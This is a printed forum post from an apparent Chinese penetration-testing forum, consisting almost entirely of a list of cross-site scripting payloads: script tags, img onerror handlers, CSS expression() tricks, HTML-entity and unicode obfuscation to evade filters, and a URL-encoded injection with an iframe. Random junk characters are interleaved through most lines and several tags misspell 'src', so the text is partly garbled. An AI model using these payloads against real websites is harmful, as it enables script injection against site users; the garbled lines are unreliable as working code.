中国网络渗透测试联盟

标题: xss [打印本页]
作者: admin    时间: 2012-9-15 14:09
标题: xss
<script>alert("跨站")</script>    (最常用)
3 l5 s0 |; h4 D% P/ S8 U<img scr=javascript:alert("跨站")></img>2 t- L  e  f, k
<img scr="javascrip&#116&#58 alert(/跨站/)></img>
1 }7 n5 Y: {* d  u+ ?<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格); H' a, y+ K) ~& I
<img scr="#" onerror=alert(/跨站/)></img>% l3 e( k7 F. \# ~/ [
<img scr="#" style="xss:expression(alert(/xss/));"></img>
0 [: N; o5 a0 m3 Q! d- S: {* ^<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释): t: o5 ?9 n* g. F3 T) S
<img src=vbscript:msgbox ("xss")></img>
! h; u: E4 v2 ~* Z: q<style> input {left:expression (alert('xss'))}</style>
- E7 x+ F' S) R: U% r/ N<div style={left:expression (alert('xss'))}></div>' P$ u: C3 J1 E6 r0 M% F
<div style={left:exp/* */ression (alert('xss'))}></div>! X: P; M" a+ b) P
<div style={left:\0065\0078ression (alert('xss'))}></div>
' o  q3 X; y6 N% D9 q$ S2 w: @; @" x, Jhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
2 Q( j* n# s: N8 ?9 d$ Z- j9 {unicode <div style="{left:expRessioN (alert('xss'))}">
; h7 Y3 \3 |" N, U8 l; X3 b1 r
% T4 ?" R0 {7 s  I* D) v2 _"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["+ P$ T* P5 `/ X, m& Y- F) z; U% s5 n




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2